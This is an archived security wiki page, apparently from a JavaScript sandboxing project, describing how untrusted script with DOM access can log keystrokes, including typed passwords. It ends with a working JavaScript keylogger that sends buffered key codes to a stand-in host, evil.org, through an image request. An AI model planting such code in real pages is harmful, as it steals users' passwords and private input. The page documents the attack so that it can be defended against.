This repository has been archived by the owner on Feb 2, 2021. It is now read-only.
DomAllowsKeylogging
Kevin Reid edited this page Apr 16, 2015
·
1 revision
(legacy labels: Attack-Vector)
If the implementation can phone home, it can log keystrokes and send them home. If the embedding page contains a password field, it could log the password as typ ed even if it can't access the password's value.
Any DOM element is reachable from any other, and the onkeypress handler on docume nt.body will receive all keystrokes in the current frame. It does not receive ke ystrokes cross frame -- not even from iframes.
Untrusted code can access a DOM element that is a parent of a password field, and
can add an onkeypress or onkeydown or onkeyup event handler.
Untrusted code can cause the browser to request a URL that it controls, or store the data for retrieval by other means.
All
Date.now = Date.now || function () { return (new Date).getTime(); };
var log = [];
var lastSend = Date.now();
document.body.onkeypress = function (event) {
log.push(event.which || event.keyCode);
if (Date.now() - lastSend > 1000) {
(new Image()).src = 'http://evil.org?keys_logged=' + log.join();
log = [];
lastSend = Date.now();
}
};